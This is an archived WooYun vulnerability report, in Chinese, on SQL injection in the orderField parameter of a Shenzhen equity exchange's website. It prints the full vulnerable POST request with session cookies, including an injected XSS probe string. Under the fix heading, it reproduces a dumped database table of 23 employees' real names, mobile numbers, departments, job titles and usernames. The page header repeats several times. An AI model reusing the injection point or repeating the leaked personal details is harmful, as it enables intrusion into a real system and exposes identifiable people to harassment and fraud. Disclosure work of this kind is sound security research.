前海股权交易中心SQL注入（400多名员工信息泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139659

漏洞标题：前海股权交易中心SQL注入（400多名员工信息泄露）

漏洞作者：深度安全实验室

提交时间：2015-09-08 11:29

修复时间：2015-10-23 11:30

公开时间：2015-10-23 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-08：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

前海股权交易中心是根据国务院关于大力发展场外资本市场的统一布局、证监会为了拓展多层次资本市场而特许设立的、地方政府监管的新型交易所。
前海股权交易中心(深圳)有限公司（简称:前海股权交易中心）是广东省区域性股权交易市场的核心组织机构，注册资本5.55亿元。中心在股东结构上引入国内三家顶级证券公司——中信证券、国信证券、安信证券。

详细说明：

前海股权交易中心主站如下链接存在SQL注入，其中，orderField参数有问题。

POST /qhee-webapp/action/stock/StockExchangeApplyAction/searchStockExchangeApply?v=1441280469326 HTTP/1.1
Content-Length: 343
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.qhee.com:443/
Cookie: __user_session_id_=c54f1d36-3c1e-4597-919a-a4ff1a85921b; JSESSIONID=9C8CC97EAE458772B4BA1E51E1454C5B; _reg_key_=zqSeigiRND2LfCLinueK; JSESSIONID=9C8CC97EAE458772B4BA1E51E1454C5B; Hm_lvt_d900963e294195855cd1da3cb5ad2f69=1441281341,1441281658,1441281676,1441281698; Hm_lpvt_d900963e294195855cd1da3cb5ad2f69=1441281698; __utmt=1; __utma=232670943.1733654246.1441278543.1441278543.1441278543.1; __utmb=232670943.10.10.1441278543; __utmc=232670943; __utmz=232670943.1441278543.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __utmv=232670943.|1=%E8%AE%BF%E9%97%AE%E7%94%A8%E6%88%B7%E7%B1%BB%E5%9E%8B=%E6%B8%B8%E5%AE%A2=1; HMACCOUNT=DC282FD335809BD8
Host: www.qhee.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
company_industry=%E5%85%B6%E4%BB%96&exchange_type=&max_exchange_num=&max_exchange_price=&min_exchange_num=&min_exchange_price=&orderField=id&orderType=desc&register_region=&register_region_id=155

漏洞证明：

泄露12个库

以qianhaidb库为例，发现324个表

以qianhaidb库、account表为例，泄露400多名内部员工的敏感信息，包括总经理的，如：姓名、手机、邮箱、部门、职称

其他的表不继续了

修复方案：

Database: qianhaidb
Table: account
[23 entries]
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+
| field8   | field9            | field2 | field3          | field1 | field6        | field7            | field4 | field5      | field10  |
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+
| 10100024 | [email protected]    | 债权业务一部 | 总经理             | 10     | 23823261      | 激活                | 谢萌楠    | 13923765797 | xiemn    |
| 10100160 | [email protected]   | 自媒体运营部 | 自媒体策划专员         | 100    | 0755-88662744 | 激活                | 廖雯彦    | 13620902026 | liaowy   |
| 10100163 | [email protected]    | 综合研究所  | 企业金融服务业务总部副总经理  | 101    | 0755-88662833 | 激活                | 孙菲菲    | 13923422825 | sunff    |
| 10100166 | [email protected]   | 自媒体运营部 | 总经理             | 102    | 88662911      | 激活                | 陈奕新    | 18038103188 | chenyx   |
| 10100167 | [email protected]   | 登记结算部  | 交易结算部总经理        | 103    | 88662898      | 激活                | 邓志文    | 13602628262 | dengzw   |
| 10100168 | [email protected]    | 信息技术总部 | 综合管理员           | 104    | 0755-88662761 | 激活                | 林志宏    | 13622304672 | linzh    |
| 10100169 | [email protected]   | 合规风控部  | 合规风控岗           | 105    | 88662754      | 激活                | 颜丹     | 13243899165 | yandan   |
| 10100170 | [email protected]   | 融资服务部  | 项目经理            | 106    | 0755-23823255 | 激活                | 冯洁连    | 13714624137 | fengjl   |
| 10100171 | [email protected]   | 信息技术总部 | 软件开发师           | 107    | 0755-88662739 | 激活                | 邹维     | 13631686532 | zouwei   |
| 10100172 | [email protected]   | 上市顾问五部 | <blank>         | 108    | 0755-23900687 | 激活                | 杨新宇    | 13510654865 | yangxy   |
| 10100174 | [email protected]   | 上市顾问十部 | 上市顾问            | 109    | <blank>       | 激活                | 兰月     | 13823184167 | lanyue   |
| 10100026 | [email protected]   | 上市顾问一部 | 上市顾问            | 11     | 0755-88662701 | 激活                | 尹欣     | 13510521026 | yinxin   |
| 10100175 | [email protected]  | 上市顾问九部 | 上市顾问            | 110    | 0755-23835483 | 激活                | 张天海    | 13726223304 | zhangth  |
| 10100176 | [email protected] | 投行业务部  | 投行业务部项目经理       | 111    | 0755-23895241 | 激活                | 王冠     | 18503061985 | wangguan |
| 10100177 | [email protected]    | 登记结算部  | 托管岗             | 112    | 0755-88662749 | 激活                | 姚子龄    | 13480801889 | yaozl    |
| 10100178 | [email protected]   | 见证业务部  | 融资管理总部见证业务部渠道经理 | 113    | 0755-88662736 | 激活                | 王天睿    | 13632862337 | wangtr   |
| 10100181 | [email protected]   | 上市顾问四部 | <blank>         | 114    | 0755-88888888 | 激活                | 董钊铭    | 15820426848 | dongzm   |
| 10100182 | [email protected]   | 上市顾问四部 | <blank>         | 115    | <blank>       | 激活                | 邓志铿    | 13923457548 | dengzk   |
| 10100183 | [email protected]     | 人力资源部  | 人力资源部员工关系岗      | 116    | 0755-88662713 | 激活                | 徐祎琪    | 18820954954 | xuyq     |
| 10100186 | [email protected]    | 培训咨询部  | 培训咨询总部产品经理      | 117    | <blank>       | 激活                | 余暾     | 18607557553 | yutun    |
| 10100189 | [email protected]    | 上市顾问三部 | 上市顾问            | 118    | <blank>       | 激活                | 林熙丹    | 13828802212 | linxd    |
| 10100190 | [email protected]  | 债权业务一部 | 产品经理            | 119    | <blank>       | 激活                | 张林钢    | 13501597852 | zhanglg  |
| 10100027 | [email protected]  | 信息技术总部 | 高级软件开发师         | 12     | 0755-88662750 | \x07\\?90\x00\x7f | 黄志涛    | 13421399407 | huangzt  |
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139659

漏洞标题：前海股权交易中心SQL注入（400多名员工信息泄露）

相关厂商：前海股权交易中心

漏洞作者：深度安全实验室

提交时间：2015-09-08 11:29

修复时间：2015-10-23 11:30

公开时间：2015-10-23 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139659

漏洞标题：前海股权交易中心SQL注入（400多名员工信息泄露）

相关厂商：前海股权交易中心

漏洞作者： 深度安全实验室

提交时间：2015-09-08 11:29

修复时间：2015-10-23 11:30

公开时间：2015-10-23 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139659"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：深度安全实验室

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源深度安全实验室@乌云